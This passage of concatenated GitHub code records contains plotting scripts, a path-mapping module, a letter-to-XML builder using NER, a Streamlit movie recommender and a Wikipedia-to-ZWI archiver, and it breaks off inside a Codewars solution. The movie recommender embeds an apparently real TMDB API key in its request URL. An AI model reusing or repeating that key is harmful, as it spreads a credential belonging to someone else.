SCALE)\nfig.set_figwidth(7.0 * SCALE)\nfig.set_tight_layout(True)\n\ndef dstack(img):\n    return np.dstack([1 - img] * 3)\n\nfor i, row in enumerate(picked_rows):\n    h = 256 + 1\n    for j, s, t in [\n        (0, slice(0, 514-2), \"Masked input\"),\n        (1, slice(514, 514*2-2), \"Reconstruction\"),\n        (2, slice(514*2, 
514*3-2), \"Ground truth\")\n ]:\n ax = axes[i][j]\n if i == 0:\n ax.set_title(t)\n ax.imshow(dstack(img[h*row:h*(row+1),s]))\n ax.tick_params(axis='x', which='both', bottom=False, top=False, labelbottom=False)\n ax.tick_params(axis='y', which='both', left=False, right=False, labelleft=False)\n\nplt.savefig(\"reconstructions.pdf\")\nplt.close()\n\nos.system(\"pdfcrop reconstructions.pdf reconstructions.pdf\")\n\n\n#########################\n# Noise size comparison #\n#########################\n\n#from ...code.app.datasets.NoiseGenerator import NoiseGenerator\nimport importlib.util\nspec = importlib.util.spec_from_file_location(\n \"app.datasets\",\n \"../../code/app/datasets/NoiseGenerator.py\"\n)\nfoo = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(foo)\nNoiseGenerator = foo.NoiseGenerator\n\n\ngen = NoiseGenerator(42, 28.75*2, 0.25, True)\n\nimg = cv2.imread(\"large-noise-solid.png\", 0)[257*2:257*3-1,513*2+4:-2] / 255\n\nsmall_noise, _ = NoiseGenerator(42, 28.75*0.25, 0.25, True)._create_random_noise_mask(*img.shape)\nstandard_noise, _ = NoiseGenerator(42, 28.75*2, 0.25, True)._create_random_noise_mask(*img.shape)\nbig_noise, _ = NoiseGenerator(43, 28.75*6, 0.25, True)._create_random_noise_mask(*img.shape)\n\nnoises = [small_noise, standard_noise, big_noise]\nnoise_names = [\"Small\", \"Medium\", \"Large\"]\n\nfig, axes = plt.subplots(2, 3)\nSCALE = 1.0\nfig.set_figheight(4.0 * SCALE)\nfig.set_figwidth(10.0 * SCALE)\nfig.set_tight_layout(True)\n\nfor i, ax in enumerate(axes[0]):\n # ax.axis(\"off\")\n ax.tick_params(axis='x', which='both', bottom=False, top=False, labelbottom=False)\n ax.tick_params(axis='y', which='both', left=False, right=False, labelleft=False)\n ax.set_title(noise_names[i])\n ax.imshow(np.dstack([noises[i]] * 3))\n\nfor i, ax in enumerate(axes[1]):\n # ax.axis(\"off\")\n ax.tick_params(axis='x', which='both', bottom=False, top=False, labelbottom=False)\n ax.tick_params(axis='y', which='both', left=False, right=False, labelleft=False)\n ax.imshow(np.dstack([1 - img * noises[i]] * 3))\n\n#plt.axes(\"off\")\n#plt.show()\n\nplt.savefig(\"noise-comparison.pdf\")\nplt.close()\n\nos.system(\"pdfcrop noise-comparison.pdf noise-comparison.pdf\")\n","repo_name":"Jirka-Mayer/MasterThesis","sub_path":"figures/06-noise/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"38276705341","text":"\n\"\"\"\nTransforms the path of the transcoded file from one base directory\nto another. 
Not useful for the standard transcode operation, but\nnecessary when moving the USB mount point from one computer to\nanother.\n\"\"\"\n\n_TRANSCODE_ORIGINAL_BASE = None\n_TRANSCODE_TRANSFORM_BASE = None\n\n\ndef tform_tcode(original_transcode_file):\n \"\"\"\n Transform the database stored transcoded filename into the local\n filename.\n \"\"\"\n assert isinstance(original_transcode_file, str)\n if _TRANSCODE_ORIGINAL_BASE is None or _TRANSCODE_TRANSFORM_BASE is None:\n return original_transcode_file\n\n if not original_transcode_file.startswith(_TRANSCODE_ORIGINAL_BASE):\n return original_transcode_file\n return _TRANSCODE_TRANSFORM_BASE + original_transcode_file[len(_TRANSCODE_ORIGINAL_BASE):]\n\n\ndef reverse_tcode(current_transcode_file):\n \"\"\"\n Transform the local transcoded filename into the database stored\n transcoded filename.\n \"\"\"\n assert isinstance(current_transcode_file, str)\n if _TRANSCODE_ORIGINAL_BASE is None or _TRANSCODE_TRANSFORM_BASE is None:\n return current_transcode_file\n\n if not current_transcode_file.startswith(_TRANSCODE_TRANSFORM_BASE):\n return current_transcode_file\n return _TRANSCODE_ORIGINAL_BASE + current_transcode_file[len(_TRANSCODE_TRANSFORM_BASE):]\n\n\ndef set_transcode_transform(original_base, transform_base):\n \"\"\"\n Set the path transformation used for the transcoded filenames.\n \"\"\"\n assert isinstance(original_base, str) and len(original_base) > 0\n assert isinstance(transform_base, str) and len(transform_base) > 0\n\n if original_base.endswith('/') or original_base.endswith('\\\\'):\n assert transform_base.endswith('/') or transform_base.endswith('\\\\')\n\n global _TRANSCODE_ORIGINAL_BASE\n _TRANSCODE_ORIGINAL_BASE = original_base\n global _TRANSCODE_TRANSFORM_BASE\n _TRANSCODE_TRANSFORM_BASE = transform_base\n\n\n_SOURCE_ORIGINAL_BASE = None\n_SOURCE_TRANSFORM_BASE = None\n\n\ndef tform_src(original_src_file):\n \"\"\"\n Transform the database stored source filename into the local\n filename.\n \"\"\"\n assert isinstance(original_src_file, str)\n if _SOURCE_ORIGINAL_BASE is None or _SOURCE_TRANSFORM_BASE is None:\n return original_src_file\n\n if not original_src_file.startswith(_SOURCE_ORIGINAL_BASE):\n return original_src_file\n return _SOURCE_TRANSFORM_BASE + original_src_file[len(_SOURCE_ORIGINAL_BASE):]\n\n\ndef reverse_source(current_source_file):\n \"\"\"\n Transform the local source filename into the database stored\n source filename.\n \"\"\"\n assert isinstance(current_source_file, str)\n if _SOURCE_ORIGINAL_BASE is None or _SOURCE_TRANSFORM_BASE is None:\n return current_source_file\n\n if not current_source_file.startswith(_SOURCE_TRANSFORM_BASE):\n return current_source_file\n return _SOURCE_ORIGINAL_BASE + current_source_file[len(_SOURCE_TRANSFORM_BASE):]\n\n\ndef set_source_transform(original_base, transform_base):\n \"\"\"\n Set the path transformation used for the source filenames.\n \"\"\"\n assert isinstance(original_base, str) and len(original_base) > 0\n assert isinstance(transform_base, str) and len(transform_base) > 0\n\n if original_base.endswith('/') or original_base.endswith('\\\\'):\n assert transform_base.endswith('/') or transform_base.endswith('\\\\')\n\n global _SOURCE_ORIGINAL_BASE\n _SOURCE_ORIGINAL_BASE = original_base\n global _SOURCE_TRANSFORM_BASE\n _SOURCE_TRANSFORM_BASE = 
transform_base\n","repo_name":"groboclown/music-uploader","sub_path":"convertmusic/transform_db_path.py","file_name":"transform_db_path.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34758785215","text":"import os\nimport pandas as pd\nfrom datetime import datetime\nimport calendar\nimport re\nfrom flair.data import Sentence\nfrom flair.models import SequenceTagger\nfrom flair.nn import Classifier\nfrom flair.data import Label\nfrom bertopic import BERTopic\nimport itertools\n\n\n\"\"\" Create letters as xml files\n\"\"\"\n\ndef load_letters_from_file(file):\n    with open(file, 'r', encoding='utf8') as f:\n        # split file into letters using '#' as delimiter\n        letters = f.read().split('#')\n    split_letters = []\n    # for each item in letters list, extract text, metadata inside '{}' and normalised text inside '[[]]' as sublist\n    for letter in letters:\n        braces_content = re.findall(r\"(\\{.*?\\})\", letter) # content between braces\n        brackets_content = re.findall(r\"\\[\\[(.*?)\\]\\]\", letter, re.DOTALL) # content between brackets\n\n        # remove content between braces and brackets from original string\n        remaining_text = re.sub(r\"(\\{.*?\\})\", \"\", letter, flags=re.DOTALL)\n        remaining_text = re.sub(r\"\\[\\[(.*?)\\]\\]\", \"\", remaining_text, flags=re.DOTALL)\n        \n\n        # append extracted content to split_letters list\n        split_letters.append([braces_content[0] if braces_content else \"\", \n                              brackets_content[0] if brackets_content else \"\", \n                              remaining_text.strip()])\n\n    return split_letters\n\n\ndef save_letter(letter, id):\n    with open(os.path.join(os.getcwd(), '..', 'data', 'letters', f'{id}.xml'), 'w', encoding='utf8') as f:\n        f.write(letter)\n\ndef string_to_dict(input_string):\n    # Remove the braces and split the string into key-value pairs\n    pairs = input_string.replace(\"{\", \"\").replace(\"}\", \"\").split(\";\")\n    # Split each pair into a key and value and strip whitespace\n    pairs = [pair.split(\":\") for pair in pairs if pair.strip()]\n    # Create a dictionary from the pairs\n    dictionary = {key.strip(): value.strip() for key, value in pairs}\n    return dictionary\n\ndef query_gpt(prompt, string):\n    # TODO\n    answer = \"Todo\"\n    return answer\n\ndef named_entity_recognition(letter):\n\n    # NER using Flair\n    # load model\n    tagger = Classifier.load('de-ner-large')\n    tagger.to('cpu')\n    \n    # wrap the letter text in a Flair Sentence\n    sentence = Sentence(letter)\n\n    # predict NER tags\n    tagger.predict(sentence)\n\n    list_of_entities = []\n\n    # print predicted NER spans\n    for entity in sentence.get_spans('ner'):\n        tag: Label = entity.labels[0]\n        #print(f'{entity.text} [{tag.value}] ({tag.score:.4f})')\n        list_of_entities.append([entity.text, tag.value])\n    \n    return list_of_entities\n\n\"\"\"\ndef topic_extraction(letters):\n    # Creating the BERTopic model\n    topic_model = BERTopic(language=\"german\", \n                           calculate_probabilities=True, \n                           embedding_model=\"deepset/bert-base-german-cased-oldvocab\")\n\n    # Fit the model on your letters\n    topics, _ = topic_model.fit_transform(letters)\n\n    # Get the topics for each letter\n    letter_topics = [topic_model.get_topic(topic) for topic in topics]\n    print(letter_topics)\n\"\"\"\n\n# Function to create a reference based on entity type\ndef create_reference(entity, unique_persons, unique_places):\n    if entity[1] == 'PER':\n        normalized_name = re.sub(r'\\b\\w+\\.','',entity[0])\n        normalized_name = re.sub('\\s+',' ', normalized_name)\n        normalized_name = ' 
'.join(normalized_name.split(' '))\n normalized_names = normalized_name.split(' ')\n if len(normalized_names) > 1:\n normalized_name = normalized_names[-1]\n\n if len(normalized_name) < 3:\n return None, None\n elif len(normalized_name) == 3 and (normalized_name == 'von' or normalized_name == 'vom'):\n return None, None\n elif normalized_name.isspace():\n return None, None\n elif normalized_name == '\\n':\n return None, None\n\n print(normalized_name)\n\n\n is_present = unique_persons['PersonName'].str.contains(normalized_name)\n filtered_df = unique_persons[is_present]\n if not filtered_df.empty:\n person_name = filtered_df['PersonName'].iloc[0] \n person_id = filtered_df['person_id'].iloc[0] \n ref = f'../register/lassberg-persons.xml#{person_id}'\n return ref, person_name\n elif entity[1] == 'LOC':\n is_present = unique_places['Ort'].str.contains(entity[0])\n filtered_df = unique_places[is_present]\n if not filtered_df.empty:\n place_id = filtered_df['place_id'].iloc[0]\n place_name = filtered_df['Ort'].iloc[0] \n ref = f'../register/lassberg-places.xml#{place_id}'\n return ref, place_name\n return None, None\n\n\ndef create_letter(letters, xml_template):\n # read in xml template as string\n with open(xml_template, 'r', encoding='utf8') as f:\n xml_template = f.read()\n #print(xml_template)\n\n # read in register.csv as dataframe\n register = pd.read_csv(os.path.join(os.getcwd(), '..', 'data', 'register', 'register.csv'), sep=';')\n\n # read in unique_places.csv as dataframe\n unique_places = pd.read_csv(os.path.join(os.getcwd(), '..', 'data', 'register', 'unique_places.csv'), sep=';')\n\n # read in unique_persons.csv as dataframe\n unique_persons = pd.read_csv(os.path.join(os.getcwd(), '..', 'data', 'register', 'unique_persons.csv'), sep=';')\n\n for letter in letters:\n try:\n xml_file = xml_template\n # extract metadata from braces as dictionary\n metadata = string_to_dict(letter[0])\n # get additionaL metadata from register.csv by marching metadata[\"ID\"] with register[\"ID\"] and safe as new df\n metadata_df = register[register['ID'] == metadata['ID']]\n # get item with metadata_df[\"place_id\"].values[0]\n place_from_metadata = unique_places[unique_places['place_id'] == metadata_df[\"place_id\"].values[0]]\n\n # replace placeholders in xml template with content from letters list\n # replace xml:id\n xml_file = xml_file.replace('xml:id=\"lassberg-letter-{XML_ID}\"', f'xml:id=\"{metadata[\"ID\"]}\"')\n xml_file = xml_file.replace('{XML_ID}', f'{metadata[\"ID\"]}')\n # get date from metadata\n date = metadata_df['Datum'].values[0]\n # replace {SENT_DATE_ISO}\n xml_file = xml_file.replace('{SENT_DATE_ISO}', date)\n # format date from yyy-mm-dd to dd.mm.yyyy\n date = datetime.strptime(date, '%Y-%m-%d').strftime('%d.%m.%Y')\n xml_file = xml_file.replace('{SENT_DATE}', date)\n # determine if letter was send to or from Lassberg\n if metadata_df['VON/AN'].values[0] == 'VON':\n xml_file = xml_file.replace('{SENT_BY}','Joseph von Laßberg')\n xml_file = xml_file.replace('{SENT_TO}', metadata_df['Name'].values[0])\n xml_file = xml_file.replace('{PERS_TO_NUMBER}\\\" ref=\\\"{GND}\\\"', f'{metadata_df[\"person_id\"].values[0]}\\\" ref=\\\"https://d-nb.info/gnd/{metadata_df[\"GND\"].values[0]}\\\"')\n xml_file = xml_file.replace('{PERS_FROM_NUMBER}\\\" ref=\\\"{GND}\\\"', f'lassberg-correspondent-0373\\\" ref=\\\"https://d-nb.info/gnd/118778862\\\"')\n xml_file = xml_file.replace('{PLACE_SENT_FROM}', f'{place_from_metadata[\"Ort\"].values[0]}')\n xml_file = xml_file.replace('{PLACE_SENT_TO}', 
'')\n sent_from = 'Joseph von Laßberg'\n sent_to = metadata_df['Name'].values[0]\n\n else:\n xml_file = xml_file.replace('{SENT_TO}','Joseph von Laßberg')\n xml_file = xml_file.replace('{SENT_BY}', metadata_df['Name'].values[0])\n xml_file = xml_file.replace('{PERS_FROM_NUMBER}\\\" ref=\\\"{GND}\\\"', f'{metadata_df[\"person_id\"].values[0]}\\\" ref=\\\"https://d-nb.info/gnd/{metadata_df[\"GND\"].values[0]}\\\"')\n xml_file = xml_file.replace('{PERS_TO_NUMBER}\\\" ref=\\\"{GND}\\\"', f'lassberg-correspondent-0373\\\" ref=\\\"https://d-nb.info/gnd/118778862\\\"')\n xml_file = xml_file.replace('{PLACE_SENT_FROM}', '')\n xml_file = xml_file.replace('{PLACE_SENT_TO}', f'{place_from_metadata[\"Ort\"].values[0]}')\n sent_to = 'Joseph von Laßberg'\n sent_from = metadata_df['Name'].values[0]\n\n # replace {REPOSITORY_PLACE}, {REPOSITORY_INSTITUTION}, {REPOSITORY_SIGNATURE}, {REGISTER_HARRIS}, {REGISTER_LASSBERG}, {PRINTED_IN}, {PRINTED_IN_URL} with value from metadata_df\n xml_file = xml_file.replace('{REPOSITORY_PLACE}', str(metadata_df['Aufbewahrungsort'].values[0]))\n xml_file = xml_file.replace('{REPOSITORY_INSTITUTION}', str(metadata_df['Aufbewahrungsinstitution'].values[0]))\n xml_file = xml_file.replace('{REPOSITORY_SIGNATURE}', '')\n xml_file = xml_file.replace('{REGISTER_HARRIS}', str(metadata_df['Nummer_Harris'].values[0]))\n xml_file = xml_file.replace('{REGISTER_LASSBERG}', str(metadata_df['Journalnummer'].values[0]))\n xml_file = xml_file.replace('{PRINTED_IN}', str(metadata_df['text'].values[0]))\n xml_file = xml_file.replace('{PRINTED_IN_URL}', str(metadata_df['url'].values[0]))\n\n # add abstract German and English\n abstract_en = query_gpt(\"Summarize the following letter sent from {sent_from} to {SENT_TO} in English: \", letter[1])\n xml_file = xml_file.replace('{ABSTRACT_ENGLISH}', abstract_en)\n abstract_de = query_gpt(\"Summarize the following letter sent from {sent_from} to {SENT_TO} in German: \", letter[1])\n xml_file = xml_file.replace('{ABSTRACT_GERMAN}', abstract_de)\n\n original_text = letter[2]\n normalized_text = letter[1]\n\n list_of_entities_normalized = named_entity_recognition(normalized_text)\n list_of_entities_original = named_entity_recognition(original_text)\n #print(list_of_entities_original)\n #print(list_of_entities_normalized)\n\n # Removing duplicates when order doesn't matter\n list_of_entities_normalized = list(k for k,_ in itertools.groupby(sorted(list_of_entities_normalized)))\n list_of_entities_original = list(k for k,_ in itertools.groupby(sorted(list_of_entities_original)))\n\n print(list_of_entities_normalized)\n print(list_of_entities_original)\n\n\n list_of_mentioned_entities = []\n\n # put entities into element in xml file\n for entity in list_of_entities_normalized:\n\n\n ref, entity_name = create_reference(entity, unique_persons, unique_places)\n if ref:\n pass\n #print(ref, entity_name)\n else:\n ref=\"\"\n\n normalized_text = normalized_text.replace(entity[0], f'{str(entity[0])[:1] + \"#+#\" + str(entity[0])[1:]}')\n normalized_text = normalized_text.replace('MISC', 'misc')\n normalized_text = normalized_text.replace('PER','person')\n normalized_text = normalized_text.replace('LOC','place')\n normalized_text = normalized_text.replace('ORG','organisation')\n\n \"\"\"\n\n ref_element = f'{entity[0]}'\n ref_element = ref_element.replace('PER', 'Person')\n ref_element = ref_element.replace('LOC', 'Place')\n ref_element = ref_element.replace('ORG', 'Organisation')\n ref_element = ref_element.replace('MISC', 'Bibl')\n\n 
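A note on the `#+#` marker used in the entity loop above: splicing it into each matched mention breaks the raw string, so the follow-up label replacements (`'PER'` -> `'person'`, etc.) and later mention replacements cannot match inside text that has already been processed; the markers are stripped again at the end. A minimal standalone sketch of the same idea follows; the `<rs>` tag name is an assumption here, since the angle-bracket markup of the original file did not survive extraction:

```python
# Marker-protected entity tagging, with (mention, label) pairs as produced
# by the flair NER step above. The <rs> tag is assumed for illustration.
def tag_entities(text, entities):
    for mention, label in entities:
        guarded = mention[:1] + "#+#" + mention[1:]  # guard against re-matching
        text = text.replace(mention, f'<rs type="{label}">{guarded}</rs>')
    return text.replace("#+#", "")  # strip the guard markers

print(tag_entities("Brief an Uhland aus Meersburg",
                   [("Uhland", "PER"), ("Meersburg", "LOC")]))
# Brief an <rs type="PER">Uhland</rs> aus <rs type="LOC">Meersburg</rs>
```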
list_of_mentioned_entities.append(ref_element)\n\n \"\"\"\n\n normalized_text = normalized_text.replace('#+#','')\n\n list_of_mentioned_entities = list(set(list_of_mentioned_entities)) \n\n\n\n for entity in list_of_entities_original:\n ref, entity_name = create_reference(entity, unique_persons, unique_places)\n if ref:\n print(ref, entity_name)\n else:\n ref=\"\"\n\n original_text = original_text.replace(entity[0], f'{str(entity[0])[:1] + \"#+#\" + str(entity[0])[1:]}')\n original_text = original_text.replace('MISC', 'misc')\n original_text = original_text.replace('PER','person')\n original_text = original_text.replace('LOC','place')\n original_text = original_text.replace('ORG','organisation')\n\n \n \"\"\"\n ref_element = f'{entity[0]}'\n ref_element = ref_element.replace('PER', 'Person')\n ref_element = ref_element.replace('LOC', 'Place')\n ref_element = ref_element.replace('ORG', 'Organisation')\n ref_element = ref_element.replace('MISC', 'Bibl')\n\n # replace list of mentioned entities by joined list\n xml_file = xml_file.replace('{ORIGINAL_STRING_MENTION}', '\\n'.join(list_of_mentioned_entities))\n \n \"\"\"\n original_text = original_text.replace('#+#','')\n\n \n # replace {ORIGINAL_TEXT} and {NORMALIZED_TEXT} with value from letters list\n xml_file = xml_file.replace('{ORIGINAL_TEXT}', original_text)\n xml_file = xml_file.replace('{NORMALIZED_TEXT}', normalized_text)\n\n save_letter(xml_file, metadata[\"ID\"])\n except Exception as e:\n print(e)\n try:\n print(letter[0])\n except:\n pass\n \n\ndef process_letters(letters):\n for letter in letters:\n create_letter(letter)\n save_letter(letter)\n \n# textfile containing letters and metadata in {} as well as normalisation of text in [[]]\nxml_template = os.path.join(os.getcwd(), '..', 'data', 'letter_template.xml')\n\nfile_with_letters = os.path.join(os.getcwd(), '..', 'data', 'temp', 'pupikofer_normalized.txt')\n\nsplit_letters = load_letters_from_file(file_with_letters)\ncreate_letter(split_letters, xml_template)","repo_name":"michaelscho/lassberg","sub_path":"src/create_xml_files.py","file_name":"create_xml_files.py","file_ext":"py","file_size_in_byte":15117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13815897809","text":"import streamlit as st\r\nimport pickle\r\nimport pandas as pd\r\nimport requests\r\n\r\ndef fetch_poster(movie_id):\r\n response = requests.get('https://api.themoviedb.org/3/movie/{}?api_key=5454ae2f555c3a6312c7514fc8fabc23&language=en-US'.format(movie_id))\r\n data = response.json()\r\n return \"https://image.tmdb.org/t/p/w500/\" + data['poster_path']\r\n\r\nsimilarity = pickle.load(open('similarity.pkl','rb'))\r\n\r\nmovies_df = pickle.load(open('movies.pkl', 'rb'))\r\nmovies_titles = movies_df['title'].values\r\n\r\n\r\ndef recommend(movie):\r\n movie_index = movies_df[movies_df['title'] == movie].index[0]\r\n distances = similarity[movie_index]\r\n movies_list = sorted(list(enumerate(distances)), reverse=True, key=lambda x: x[1])[1:6]\r\n\r\n recommend_movies = []\r\n recmnd_movie_pstr = []\r\n\r\n for i in movies_list:\r\n movie_id = movies_df.iloc[i[0]].movie_id\r\n\r\n recommend_movies.append(movies_df.iloc[i[0]].title)\r\n\r\n recmnd_movie_pstr.append(fetch_poster(movie_id))\r\n return recommend_movies,recmnd_movie_pstr\r\n\r\n\r\nst.title(\"Movie Recommender System\")\r\n\r\nselected_movie_name = st.selectbox(\r\n 'Enter the movie name',\r\n movies_titles\r\n)\r\n\r\nif st.button('Recommend'):\r\n names,posters = 
recommend(selected_movie_name)\r\n col1, col2, col3, col4, col5 = st.beta_columns(5)\r\n with col1:\r\n st.text(names[0])\r\n st.image(posters[0])\r\n with col2:\r\n st.text(names[1])\r\n st.image(posters[1])\r\n with col3:\r\n st.text(names[2])\r\n st.image(posters[2])\r\n with col4:\r\n st.text(names[3])\r\n st.image(posters[3])\r\n with col5:\r\n st.text(names[4])\r\n st.image(posters[4])","repo_name":"Aryan-janghu/movie-recommendation","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71405878887","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# This script needs to run imidiatly after viewing wikipedia since WP caches files!\n# It is recommended to run in withing a few minutes after watching the WP article \n# If you run this script after 1 day after viewing article, some articles will not be available\n# S.Chekanov\n\nfrom bs4 import *\nimport argparse\nimport requests\nimport re,os\nimport gzip \nimport shutil # to save it locally\nimport zlib,zipfile\nimport sys, json, urllib.parse\nfrom time import time \nimport tempfile\n\ndirpath = tempfile.mkdtemp()\n\nstime=str(int(time()))\nprint(\"Time=\",stime)\nprint(\"TMP dir=\",dirpath)\n\n#### input parameters ####\nkwargs = {}\nparser = argparse.ArgumentParser()\nparser.add_argument('-q', '--quiet', action='store_true', help=\"don't show verbose\")\nparser.add_argument('-o', '--output', help=\"Save output to\")\nparser.add_argument(\"-i\", '--input', help=\"Input HTML cached file\")\nparser.add_argument(\"-s\", '--source', help=\"Source of encyclopedia\")\nparser.add_argument(\"-t\", '--title', help=\"Title of the article\")\n\nargs = parser.parse_args()\nargs.verbose = not args.quiet\nprint(\"Input=\",args.input)\nprint(\"Output=\",args.output)\nprint(\"Article title =\",args.title)\nprint(\"Encyclopedia source=\",args.source)\nprint(\"Is verbose=\",args.verbose)\n\n# this is where data go\nimg_dir=\"data/media/images\"\ncss_dir=\"data/css\"\nfolder_images=dirpath+\"/\"+img_dir\nfolder_css=dirpath+\"/\"+css_dir\n\n# CREATE FOLDER\ndef folder_create(images):\n\n os.system(\"rm -rf \"+folder_images);\n os.system(\"rm -rf \"+folder_css);\n\n try:\n # folder creation\n os.system(\"mkdir -p \"+folder_images)\n os.system(\"mkdir -p \"+folder_css)\n \n # if folder exists with that name, ask another name\n except:\n print(\"Folder Exist with that name!\")\n pass\n\n # image downloading start\n download_images(images, folder_images)\n \n \n# map to keep replacements for images \nimageReplacer={}\ncssReplacer={}\n\n\ndef zipdir(path, ziph):\n # ziph is zipfile handle\n for root, dirs, files in os.walk(path):\n for file in files:\n ziph.write(os.path.join(root, file),\n os.path.relpath(os.path.join(root, file),\n os.path.join(path, '..')))\n\n# DOWNLOAD ALL IMAGES FROM THAT URL\ndef download_images(images, folder_name):\n \n # intitial count is zero\n count = 0\n \n # print total images found in URL\n print(f\"Total {len(images)} Image Found!\")\n\n if len(images) == 0: return;\n\n allImages=[]\n for i in range(len(images)):\n if (images[i].get('src') !=None): allImages.append(images[i].get('src'))\n if (images[i].get('srcset') !=None): \n ss= images[i].get('srcset').split();\n for i in range(len(ss)):\n allImages.append(ss[i])\n \n if (images[i].get('data-srcset') !=None): \n ss= images[i].get('data-srcset').split();\n for i in range(len(ss)): \n allImages.append(ss[i])\n if 
(images[i].get('data-src') !=None): allImages.append(images[i].get('data-src'))\n\n for i in range(len(allImages)):\n image_link=allImages[i]\n if (image_link.find(\"//\")==-1): continue\n\n if (args.verbose): print(i,\" \",allImages[i])\n # 1.data-srcset\n # 2.data-src\n # 3.data-fallback-src\n # 4.src\n # 5.srcset \n\n #newname=os.path.basename(image_link)\n newname = image_link.split(\"/\")[-1]\n filename=folder_name+\"/\"+newname\n if (args.verbose): print(count+1, \") downloading=\",image_link,\" to \"+filename)\n\n # correct link when starts with //\n xurl=image_link\n if (xurl.startswith(\"//\")): xurl=\"https:\"+image_link\n r = requests.get(xurl, stream = True)\n\n\n # check svg used in for formulars. Wikipedia does not have file extention! \n # formulars are made in SVG. The browser should know this by extension. \n\n xnames=img_dir+\"/\"+newname\n if (newname.find(\".\")==-1):\n if (image_link.find(\"/svg/\")>-1): \n filename=folder_name+\"/\"+newname+\".svg\";\n xnames=img_dir+\"/\"+newname+\".svg\"; \n\n # remeber replacements\n imageReplacer[image_link]=xnames\n\n # Check if the image was retrieved successfully\n if r.status_code == 200:\n # Set decode_content value to True, file's size will be zero.\n r.raw.decode_content = True\n \n with open(filename,'wb') as f:\n shutil.copyfileobj(r.raw, f)\n\n count = count+1\n if (args.verbose): print('Image sucessfully Downloaded: ',filename)\n else:\n print(image_link,' couldn\\'t be retreived')\n pass\n print(\"Downloaded=\",count,\" images\") \n return count\n\n\n# extract CSS\ndef extractCSS(soup):\n count=0\n for link in soup('link'):\n if link.get('href'):\n if link.get('type') == 'text/css' or link['href'].lower().endswith('.css') or 'stylesheet' in (link.get('rel') or []): \n new_type = 'text/css' if not link.get('type') else link['type']\n css = soup.new_tag('style', type=new_type)\n css['data-href'] = link['href']\n for attr in link.attrs:\n if attr in ['href']:\n continue\n css[attr] = link[attr]\n r_url=link['href']\n if (args.verbose): print(css[attr],r_url) \n r = requests.get(r_url, allow_redirects=True)\n newname = r_url.split(\"/\")[-1]\n filename=folder_css+\"/\"+newname\n cssReplacer[ r_url ] = css_dir+\"/\"+newname \n count=count+1 \n with open(filename,'w') as f:\n f.write(r.text)\n \n print(\"Downloaded=\",count,\" css files\") \n return count \n\n\n# MAIN FUNCTION START\ndef main(html):\n \n # content of URL\n #r = requests.get(url)\n \n # Parse HTML Code\n soup = BeautifulSoup(html, 'html.parser')\n\n # nicely looking\n # html = soup.prettify() #prettify the html\n\n # find all images in URL\n images = soup.findAll('img')\n \n # Call folder create function\n folder_create(images)\n\n # extract CSS\n extractCSS(soup)\n\n xmedia=[]\n htmlnew=html\n print(\"-> Make CSS replacements\")\n for key in cssReplacer:\n xmedia.append(cssReplacer[key])\n if (args.verbose): print(key,\" replaced by \",cssReplacer[key])\n htmlnew=htmlnew.replace(key,cssReplacer[key])\n\n print(\"-> Make image replacements\")\n n=0\n for key in imageReplacer:\n xmedia.append(imageReplacer[key])\n if (args.verbose): print(n, \")\", key,\" replaced by \",imageReplacer[key])\n htmlnew=htmlnew.replace(key,imageReplacer[key])\n n=n+1\n\n output=args.output\n z = zipfile.ZipFile(output, 'w', compression=zipfile.ZIP_DEFLATED) # this is a zip archive\n z.writestr(\"article.html\", htmlnew)\n #for key in imageReplacer:\n # z.write(imageReplacer[key].encode(), imageReplacer[key].encode(), zipfile.ZIP_DEFLATED )\n zipdir(dirpath+'/data/', z)\n 
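The archive assembly here is plain `zipfile` usage: string entries go in through `writestr()`, on-disk trees through the `zipdir()` helper. A self-contained sketch of the same pattern, with made-up file names:

```python
import json
import zipfile

# Pack an HTML string plus JSON metadata into one archive, mirroring the
# article.html / metadata.json layout built above.
with zipfile.ZipFile("demo.zwi", "w", zipfile.ZIP_DEFLATED) as z:
    z.writestr("article.html", "<html><body>hello</body></html>")
    z.writestr("metadata.json", json.dumps({"ZWIversion": "1", "Title": "demo"}))

with zipfile.ZipFile("demo.zwi") as z:
    print(z.namelist())  # ['article.html', 'metadata.json']
```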
#htmltit=os.path.basename(args.input)\n    #htmltit=htmltit.replace(\".html.gz\",\"\")\n    #htmltit=htmltit.replace(\".html\",\"\")\n    metadata = {\"ZWIversion\":\"1\",\"Title\":args.title, \"CreatorName\":args.title,\"Primary\":\"article.html\",\"LastModified\":stime}\n    z.writestr(\"metadata.json\", json.dumps(metadata))\n    z.writestr(\"media.json\", json.dumps(xmedia))\n    z.close()\n\n    print(\"Cleared =\",dirpath) \n    cmd=\"rm -rf \"+dirpath\n    os.system(cmd) \n    print(\"Created =\",args.output)\n    \n\n# get HTML\nHTML=\"\";\nindex=args.input\n\ntry:\n\n    if index.endswith('.html'):\n        ret = open(index, 'r', encoding='utf-8').read()\n    elif index.endswith('.html.gz'):\n        ret = gzip.open(index, 'rt',encoding='utf-8').read()\n\n    # prepare file header and footer\n    data_head=open('html_header.html', 'r', encoding='utf-8').read();\n    data_footer=open('html_footer.html', 'r', encoding='utf-8').read();\n    HTML=data_head+ret+data_footer;\n    HTML=urllib.parse.unquote(HTML) # replace %28 %29 with ()\nexcept IOError as err:\n    print(\"Error\")\n\n# CALL MAIN FUNCTION\nmain(HTML)\n","repo_name":"chekanov/ZWIBuilder","sub_path":"process_zwi.py","file_name":"process_zwi.py","file_ext":"py","file_size_in_byte":8780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14669206119","text":"#Solution in response to https://www.codewars.com/kata/57cebe1dc6fdc20c57000ac9\r\n#CodeWars Shortest Word, Level 7kyu Difficulty\r\n#Instructions:\r\n#Simple, given a string of words, return the length of the shortest word(s).\r\n#String will never be empty and you do not need to account for different data types.\r\n\r\n#for every word in the string, if the length of the next word is less than the current shortest length, set the shortest length equal to it\r\n\r\ndef find_short(s):\r\n    words = s.split()\r\n    short = len(words[0])\r\n    for word in words[1:]:\r\n        if len(word) < 